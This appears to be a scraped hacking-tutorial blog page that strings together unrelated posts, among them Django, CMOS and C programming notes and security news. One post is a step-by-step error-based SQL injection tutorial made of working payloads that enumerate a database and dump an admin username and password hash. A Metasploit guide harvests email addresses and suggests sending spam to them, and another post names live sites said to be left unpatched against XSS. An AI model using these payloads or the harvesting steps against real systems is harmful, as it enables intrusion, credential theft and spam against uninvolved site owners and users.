Network 18's Websites are vulnerable to cross site scripting attack

Cross-site scripting (XSS) is a type of computer security vulnerability found in Web applications. XSS  enables attacker to inject client-side script into Web pages viewed by other users.  The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain (a reflected or non-persistent XSS vulnerability).  Lots of Indian websites are vulnerable to OWASP TOP-10 listed attack vectors that is cross site scripting abriviated as 'XSS'- attack.

              Here is the  Network 18's websites, which are vulnerable to Cross Site Scripting attack.

                                                  FOUNDED AND REPORTED BY-
                                                
                                             INDRANIL BANERJEE (NULL_()_VOID)

                                                                 CO-FOUNDER,

                                                      OPENFIRE-SECURITY.NET




1.  In.com – top rated Indian website. Vulnerable to XSS attack Persistent as well as DOM based.  Reported but  not fixed yet.

2.  Cj.ibnlive.com – Vulnerable to XSS has other potential  Threats-  Reported months ago but not fixed yet.

3.  Bitztech2.in.com – vulnerable to XSS not reported just published!!!

4.  Ibnlive.in.com – Vulnerable to XSS and has others threats. Reported but not fixed yet.

5.  Khabar.ibnlive.in.com – Vulnerable to XXS (Persistent). Has other vulnerabilities. Reported but not fixed yet.

6.  Moneycontrol.com – N18 website!! Vulnerable to XSS (non-persistent). Have more vulnerability. Reported  earlier but still not fixed.

7.  Poweryourtrade.moneycontrol.com – Vulnerable to XSS. REOPORTED BUT NOT FIXED YET.

Here is the demonstration of the vulnerable Network 18’s websites. All are reported but still no action is taken by the concerned authority.
No harm is made on those websites by  NULL_()_VOID  ,it’s just a random testing result which might not harm those websites but can disrupt the reputation of those.


I have attached a pdf file also. Which was given by NULL_()_VOID to us. Please download it to know more.

DOWNLOAD :-   http://www.mediafire.com/view/?bv7s89fnor1f3cr


FILE PASSWORD:-  i-love-null-void


                                                          THANK YOU 

Continue >>

MTCMOS (multithreshold CMOS)

MTCMOS:- 

                      MTCMOS (multithreshold CMOS) circuits  are an effective means to achieve lower

operating voltages in digital circuits. These circuits are constructed of MOSFETs that have two different

threshold voltages— some have a high Vth and others a low one. High-speed operation at low supply

voltages can be achieved by using lowVth MOSFETs to construct the logic circuits and blocking the

standby leak current that arises in these logic circuits because of the low Vth with power switch

transistors constructed of high Vth MOSFETs, making it possible to apply these circuits to batterydriven 

devices such as wearable information equipment. A DSP (1.2 V, 20 MHz operation) that employs

this technology has already been introduced in a wristwatch personal handy-phone system terminal,

contributing to lower power consumption in audio signal processing.  

Using FD-SOI devices to construct the MTCMOS circuits even further improves the operation speed

under low-voltage conditions . By combining 250–180 nm gate FD-SOI devices and MTCMOS

circuit technology, it is fully possible to implement a digital signal processing chip for a wearable

terminal that operates at high speeds (100 MHz or higher) at 1 V.

THANK YOU 

Continue >>

C Program To Test The ENDIANNESS Of A Processor

How to execute a simple C program to test the Endianness of a processor? Well it is simple and cool as C is a core hardware based programming language we can simply do it by executing the following program in our compiler.

.....................................................................................................................................................

A short C program to test the endianness of a processor.

......................................................................................................................................................

 #include <stdio.h>
 #include <conio.h>
 #include <stdlib.h>
 void main( int argc, char*argv[] )
 {
 unsigned char x[4];
 unsigned int y;
 *( unsigned int*)( x ) = 0x03020100;
 y = ( ( unsigned int )( x[0])<< 0)|
 ( ( unsigned int )( x[1])<< 8)|
 ( ( unsigned int )( x[2])<<16)|
 ( ( unsigned int )( x[3])<<24);
 if( y == 0x03020100 )
 printf( "little endian\n" );
 else
 printf( "big endian\n" );
 getch();
 }

If you like this post do like our facebook page below!

Continue >>

ERROR BASED SQL INJECTION Full Tutorial

SQL Injection is most important part of web hacking. I am not going to show you sql injection basic, because all of you already know it. This is all about ERROR BASED SQL INJECTION. so, let's start ;)

You can use Error based sql injection in the following errors you get :




a. The Used Select Statements Have Different Number Of Columns.

b. Unknown Column 1 or no columns at all (in webpage and page source)
c. Error #1604


To know the Version of database :-


Code: or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--




Url looks like :- https://www.sitename.com/...php?id=165 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

Version of database is 5

To get the Database name:




CODE: and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)










Url looks like:- https://www.sitename.com/...php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)










so, the database name is "dkg"




To get TABLE NAMES:

CODE: and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

URL looks like:- https://www.sitename.com/..php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

When you search for tables keep incrementing the limit untill you find the valuable table name. example: LIMIT 0,1

LIMIT 1,1

LIMIT 2,1

formula: LIMIT N,1 where N is a random integer

Valuable Tables can be :- Users, Admin, user, Administrator etc.

In this case I found a valuable table at LIMIT 3,1

Found TABLE "uvp_Users"

TO get COLUMNS form a specific TABLE NAMES:-

CODE: and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Looks at the LIMIT 0,1 & 0xTABLEHEX

You need to chnage your specific TABLE to hex
use this site:- http://www.swingnote.com/tools/texttohex.php

keep incrementing the value of LIMIT untill you find a valuable column name. I found "Username" a LIMIT 0,1 & "Password" at LIMIT 1,1

URL looks like(for column Username):- https://www.sitename.com/..php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7576705f5573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)






URL looks like (for column Password):- https://www.sitename.com/..php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7576705f5573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)






To extract data from columns:-

CODE: and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

COLUMN_NAME replace with "Username" & "Password"

DATABASE replace with "dkg"

TABLENAME replace with "uvp_Users"




URL looks like:- https://www.sitename.com/...php?id=165 and (select 1 from (select count(*),concat((select(select concat(cast(concat(Username,0x7e,Password) as char),0x7e)) from dkg.uvp_Users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)






SUCCESS, Username:- admin

Password: 462d9cebb6479dbf66d1b965b10181a7




Now decrypt this hash , You are done! 

Continue >>

Understanding DJANGO - Create a DJANGO Project [Full Tutorial With Image]

Hello all Welcome to hacktree. In this topic, you will learn basic cocept of Django, What is Django? Why Django? etc... So, Let's start.

What is Django?

Django is a high-level web framework that simplifies website development. Its a Python framework. Its allowing developers to quickly implement database-backed websites using dynamic web pages. . Django is pronounced "JAN-go" with the "D" silent. By dynamic, we mean web pages that are built on-the-fly using data from the browser request, URL, and a database. Dynamic pages solve several different problems. 

Django follows a Model View Controller (MVC) architecture to separate the data, logic, and view layers in website development. 




Why use Django?

1.      it's easy to set up a production website in no time at all.

2.      Its components or even entire websites are portable and can be used in other websites

Understanding Models:-

Django is a python framework. It implements a python class, django.db.models.Model, to define data models that will be used in a website. 

Configuring the settings.py File:-

Most of the website configuration that you need to implement is done in the settings.py file. When you create a new project, Django automatically adds the settings.py file to the project's root directory. This file contains the configuration for database, installed applications and numerous other configuration settings. 

Using the manage.py Utility:-

Another file that is automatically installed in each project you create is the manage.py utility.

The manage.py utility is used to perform all kinds of development, administration, and testing tasks. The best way to describe the manage.py utility is to list some of the commands you can implement:

·         startproject creates a new Django project. A directory is created for the project that includes the initial files.

·         startapp creates a new application in a Django project. A directory is created for the application that includes the initial files.

·         syncdb synchronizes data from project models to the SQL database.

·         runserver starts the development server.

·         shell launches a Python interpreter shell that has access to the Django project, including the database.

·         dbshell launches an SQL command-line client for the database.

Django Developement Server:-

Start the development server using the following command at the root of your Django project:

python manage.py runserver.

The best thing is Django comes with a lightweight development HTTP server that you can use to test

your website while you are developing it.

Admin Interface:-

Installing Django:-

Install the released version of Django:-


1.

Install Python 2.3 or later.

2.

Download the Django tarball from the following location:

http://www.djangoproject.com/download

3.

Use the following command to extract the tarball:

tar xzvf Django-version.tar.gz

4.

Change the directory to the Django directory created by extracting the tarball:

cd Django-version

5.

Use the following command to install Django (you need to use the sudo command on Linux so that Django gets installed as the super user):

python setup.py install

sudo python setup.py install (linux)

6.

Start a Python interpreter.

7.

Use the following command to verify that Django is installed:

import django

django.VERSION


Install the development version of Django:-


1.

Install Python 2.3 or later.

2.

Install Subversion.

3.

Check out the Django trunk using the following Subversion command:

svn co http://code.djangoproject.com/svn/django/trunk django_src

4.

Either copy the django_src/django directory, or create a symbolic link to that directory in the Python site-packages directory to place Django in the Python path.

5.

Copy django/bin/django-admin.py somewhere in the system path.

(You don't need to run setup.py because it does what was done in steps 4 and 5.)

6.

Start a Python interpreter.

7.

Use the following command to verify that Django is installed:

import django

django.VERSION

Create Your First Django Project:-

1.From a command prompt, change to the directory where you want to store the code for the iFriends project.


2.Create a directory called iFriends. This will be the root directory for the iFriends project.


3.Change to the iFriends directory.


4.Type the following command to create the iFriends project:

python django-admin.py startproject iFriends


The startproject command creates the following files:


· __init__.py :- is an empty file that tells Python that the website directory should be treated as a Python package.


· manage.py :- is the command-line utility that allows the administrator to start and manage the Django project.


· settings.py :- is the configuration file that controls the behavior of the Django project.


· urls.py :- is a Python file that defines the syntax and configures the behavior of the URLs that will be used to access the website.

Continue >>

OWASP Security Shepherd 1.2 Released

Security Shepherd is a computer based training application for web application security vulnerabilities. This project strives to hurde the lost sheep of the technological world back to the safe and sound ways of secure practises. Security Shepherd can be deployed as a CTF (Capture the Flag) game or as an open floor educational server.

Easy configuration to suit every use

Security Shepherd has been designed and implemented with the aim of fostering and improving security awareness among a varied skill-set demographic. This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use. Utilizing the OWASP top ten as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. The bi-product of this challenge game is the acquired skill to harden a players own environment from OWASP top ten security risks The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.

Security Shepherds vulnerabilities are not simulated, and are instead delievered through hardened real security vulnerabilities that can not be abused to compromise the application or it's environment. Many of these levels include insufficient protections to these vulnerabilities, such as black list filteres and poor security configuration. Security Shepherd includes everything you need to complete all of it's levels including the OWASP Zed Attack Proxy Project and portable browsers already configured for proxy use.

The Security Shepherd project covers the following web application security topics;

• SQL Injection
• Cross Site Scripting
• Broken Authetication and Session Management
• Cross Site Rrequest Forgery
• Insecure Direct Object Reference
• Insecure Cryptographic Storage
• Failure to Restrict URL Access
• Unvalidated Redirects and Forwards
• Insufficient Transport Layer Security

Download OWASP Security Shepherd 1.2

Source :- securitygeeks.net

Continue >>

BASIC CONCEPT OF BUFFER OVERFLOW (PART-I)

Hello all welcome to Hacktree.
In this part we will discuss about basic of buffer overflow concept (Introduction).  I will post basic to advance level day by day. For this tutorial you have to know basic of C programing. so, Let's start

Buffer overflows have been the most common form of security vulnerability in the last ten years.

A primary example is to reveal sensitive files such as /etc/passwd and /etc/shadow (which store the user names and encrypted passwords of your users.) Once these are in his or her hands, it is possible to use a "dictionary" attack on the passwords.  Alternatively, they can have your system FTP over an infected file and run it, which can be as bad or worse. In order to do this, they need to get a "trusted" program to execute commands they specify. Usually, this is done by a "buffer overrun" attack. Typically, buffer overrun attacks are aimed at programs that implement network functions, such as Web servers and mail servers.

In the C language, a buffer overflow results in what is known as undefined behavior. Sometimes, it might crash the program. 

At first you should know the form of a stack

Example 1:-

void function(char *str){

                char buffer[16];

                strcpy(buffer, str);

}

int main(){

                char large_string[256];

                int i;

                for (i = 0; i < 255; i++){

                                lrg_string[i] = ‘A’;

                }

                function(lrg_string);

}

When this program is run, it results in a segmentation violation

The return address is overwritten with ‘AAAA’ (0x41414141)

Function exits and goes to execute instruction at 0x41414141…..

Example 2:

#include <stdio.h>

#define BUFFER_SIZE  16

int

main (void)

{

char  fName[BUFFER_SIZE];  /*this defines a character string of size BUFFER_SIZE, in this case 16.
                                                        this string will hold up to 15 characters + a NULL */

printf ("Please enter your first name: ");  /* simply promotes the operator to enter his/her first name*/

scanf ("%s", fName);     /* this will take the input */

printf ("Welcome, %s\n", fName);  /* Finally print a greeting  to the operator */

return 0;

}

This is a valid ANSI C code.

Now,  run our sample program:

$ ./name

Please enter your first name: Abhijit

Welcome,  Abhijit

$

Works right.. okk … but the operator decides that his name needs to be “aljkshfhsgfjsggegdirvskdgfrifhfbsjsjjsklsifbvnbmkfkfk” then? Lets see ;)

$ ./name

Please enter your first name: aljkshfhsgfjsggegdirvskdgfrifhfbsjsjjsklsifbvnbmkfkfk

Welcome, aljkshfhsgfjsggegdirvskdgfrifhfbsjsjjsklsifbvnbmkfkfk

Segmentation fault (core dumped)

$

Oopsss :O what happend?  ;)   we told that we can not supplying a character string more than 16 (15+a NULL) characters.. but in this case, we supplied it with 55 characters.  So, We just created  a Buffer over flow.

Now, what to do?

We use fgets() function to solve this problem.  fgets()is designed to prevent input from extending beyond the memory allocated to it . Our new program is:

#include <stdio.h>

#define BUFFER_SIZE 16

int

main (void)

{

char fName[BUFFER_SIZE];

printf ("Please enter your first name: ");

fgets (fName, sizeof(fName), stdin); 

printf ("Welcome, %s\n", fName);

return 0;

}

now run the program:

$ ./fname

Please enter your first name: Abhijit

Welcome, Abhijit

$

There are two blank line in the output, because fgets() retains a new line character.

Lets check, what happens when we input long characters ;)

$ ./fname

Please enter your first name: aljkshfhsgfjsggegdirvskdgfrifhfbsjsjjsklsifbvnbmkfkfk

Welcome, aljkshfhsgfjsgg

$

Now, It takes only 15 characters + a NULL for using fgets() function.

SO THIS IS TOO BASIC… IF YOU HAVE ANY QUESTIONS , THNE PLEASE COMMENT HERE. I WOULD LIKE TO REPLY :D

Continue >>

Antivirus Forensics Tools

Rkhunter

Rootkit scanner is scanning tool to ensure you for about 99.9%* you’re clean of nasty tools. This tool scans for rootkits, backdoors and local exploits. rkhunter is a shell script which carries out various checks on the local system to try and detect known rootkits and malware.

Step 1:- Click on terminal in Backtrack 5.

Step 2:- Type rkhunter --check

Chkrootkit

chkrootkit is a tool to locally check for signs of a rootkit. It contains a chkrootkit: shell script that checks system binaries for rootkit modification. Chkrootkit is a powerful tool to scan your Linux server for Trojans.

Step 1:- Click on terminal in Backtrack 5

Step 2:- type cd ..

Step 3:- cd /pentest/forensics/chkrootkit

Step 4:- ./chkrootkit 

Continue >>

How to Use MSFconsole To Collect Email Addresses

STEP 1 : Click on Backtrack.

STEP 2 : GOTO EXPLOITATION TOOLS.

STEP 3 : GOTO NETWORK EXPLOITATION TOOLS.

STEP 4 : GOTO METAEXPLOIT FRAMEWORK.

STEP 5 : OPEN msfconsole .

When msfconsole will open now write search collector infront of 

msf > search collector And press Enter.

In this step write use auxiliary/gather/search_email_collector as shown above or you can copy the line from above and paste below .

msf > use auxiliary/gather/search_email_collector

In this step write only : show options as shown above.

Thenyou have to set domain . To set the domain write :

Set domain <domiain name >

For Example :Set domain amity.edu

Now write exploit and press Enter to start the process . Your search will begin , and ends with a result as shown in below image.

Now you got all the mail , now you can do whatever you want :

   =>> You can save e-mail addresses. 

   =>> You can send mail to a particular addresses.

   ==> You can send spams. 

   
If you like our tutorial please like us on facebook page below. 

 

Continue >>

Biggest Cyber Attack Slows Down The WWW Ever Happened In The History Of Internet

The headlines have been apocalyptic: "Global internet slows after biggest attack in history"; "Biggest ever cyberattack slows internet for millions"; "The attack that nearly broke the internet"; "Cyber attack jams crucial infrastructure around the world".

 

So how was it for you?
According to a company called CloudFlare, which specialises in helping websites minimise the impact of online junk data attacks by effectively creating more targets and thus spreading the burden between them, this particular assault – by a Dutch hosting company, Cyberbunker, on a not-for-profit anti-spam organisation called Spamhaus – eventually escalated to cause "congestion across several major [top-level, backbone internet networks], primarily in Europe, that would have affected hundreds of millions of people ... "
Hence, presumably, the armageddon headlines. Except, as the tech website Gizmodo points out, not many people seem to have noticed: few have complained that the internet was more than usually sluggish; movie-streaming services such as Netflix did not go down; mega net-enterprises such as Amazon reported nothing unusual; organisations that monitor the health of the web "showed zero evidence of this Dutch conflict spilling over into our online backyards". Specialists contacted by the site reported that the attack, major as it was, had "a severe impact" on the websites it was directed at, but it certainly did not shake the internet to its core.

What is becoming clear is that the attack is an outgrowth of a little-known, but highly explosive war between two factions: on one side are the Internet service providers (ISPs) and Web hosts that don’t ask their clients too many questions about whether they are hosting spam and other kinds of malicious code; on the other are groups that try to name and shame the spammers, and stop them from infiltrating your inbox—or worse, your bank’s servers. This side is engaged in a massive game of virtual whack-a-mole, only one with no end in sight.

In this latest retaliatory attack, the spammers got the better of their opponents, shutting down servers and slowing down the entire Internet. One man so far has come forward, claiming to be the spokesman for the attackers—a man named Sven Olaf Kamphuis. A so-called Internet activist, Kamphuis disdains government regulation of the Internet and, at least according to his Facebook page, gays and Jews. In an interview with The Daily Beast, Kamphuis said he owns an ISP that was put on a blacklist by the Geneva-based anti-spam company Spamhaus. Companies on the blacklist are blocked by email providers and other Internet service companies, which means they’re essentially kicked off the Internet.

So Kamphuis and others on the blacklist formed an opposition group, Stophaus, and earlier this month, they launched the most powerful “distributed denial of service” (DDoS) attack in the history of the Internet. DDoS attacks flood a server with data—in this case, 300 billion bits of data per second—at a rate it can’t possibly handle, thereby shutting it down. Stophaus’s onslaught overwhelmed not just Spamhaus’s servers, but the rest of the Internet, too. Thus, Netflix users around the world were suddenly wondering why they couldn’t stream You’ve Got Mail.

“There are a lot of people who are really pissed off about this,” Kamphuis said of Spamhaus. “And we are the first to show some balls and do something about it.”

Kamphuis said he himself had nothing to do with DDoS attacks. “I am a spokesman for Stophaus,” he said. “But being in the Internet industry I cannot have anything to do with these attacks.” Kamphuis said his group decided to stop the attacks on Tuesday, but said there are other hackers, and possibly even governments, who would like to continue the assault.

The attacks on Spamhaus illustrate a larger problem with the vulnerability of systems fundamental to the architecture of the Internet, the Domain Name Servers (DNS). The high attack bandwidth is made possible because attackers are using misconfigured domain-name service (DNS) servers known as open recursive resolvers or open recursors to amplify a much smaller attack into a larger data flood.

Known as DNS reflection, the technique uses requests for a relatively large zone file that appear to be sent from the intended victim's network. According to CloudFlare, it initially recorded over 30,000 DNS resolvers that were tricked into participating in the attack. There are as many as 25 million of these open recursive resolvers at the disposal of attackers

"In the Spamhaus case, the attacker was sending requests for the DNS zone file for ripe.net to open DNS resolvers. The attacker spoofed the CloudFlare IPs we'd issued for Spamhaus as the source in their DNS requests. The open resolvers responded with DNS zone file, generating collectively approximately 75Gbps of attack traffic. The requests were likely approximately 36 bytes long (e.g. dig ANY ripe.net @X.X.X.X +edns=0 +bufsize=4096, where X.X.X.X is replaced with the IP address of an open DNS resolver) and the response was approximately 3,000 bytes, translating to a 100x amplification factor."

It now seems that the attack is being orchestrated by a Dutch hosting company called CyberBunker. As long as it's not child porn and anything related to terrorism, CyberBunker will host it, including sending spam.  Spamhaus blacklisted CyberBunker earlier in the month.

However, the DDoS attacks have raised concerns that further escalations of the retaliatory attacks could affect banking and email systems. DDoS attacks are typically carried out to extort money from targeted organisations or as a weapon to disrupt organisations or companies in pursuit of ideological, political or personal interests.

Source: BBC, THN

Continue >>

How to View Last Activity of Your PC

LastActivityView is a tool for Windows operating system that collects information from various sources on a running system, and displays a log of actions made by the user and events occurred on this computer.

 

Here is the download link :-

Continue >>

Google's two-factor authentication bypassed

Google has fixed a vulnerability which could in theory have enabled attackers to compromise Google accounts protected by two-factor authentication. However, the company did take seven months to do so.
If this security feature is activated, Google requests an additional one-time password when a user tries to log into their Google account. The one-time password is generated by a smartphone app or can be delivered by text message. The requirement for an additional authentication factor means that the account is protected from unauthorised access should the user's access credentials fall into the wrong hands – access to the mobile phone associated with the account is also required.
There is, however, an intentional backdoor for applications which are not set up for two-factor authentication in the form of application specific passwords (ASP). If, for example, you want to use Thunderbird to download email from a Google account secured using two-factor authentication, you simply generate an ASP which is submitted by Thunderbird in place of the normal password.
This has the disadvantage that an attacker who intercepts the ASP then has access to email, calendar items and contacts without requiring the one-time password. Under normal circumstances, it should not be possible to permanently take over the user's Google account (for example by changing the main password) using an ASP.
But this is exactly what security researchers from Duo Security were able to do. Using an API intended for Android, they were able to use an ASP to access account settings, change the password for the Google account and even deactivate two-factor authentication.
The researchers reported their discovery to Google last July, but the vulnerability was only fixed at the end of last week. Google now checks whether sessions attempting to access account settings were authenticated by means of an ASP and, if they were, requires additional two-factor authentication.

Source :-h-online.com

Continue >>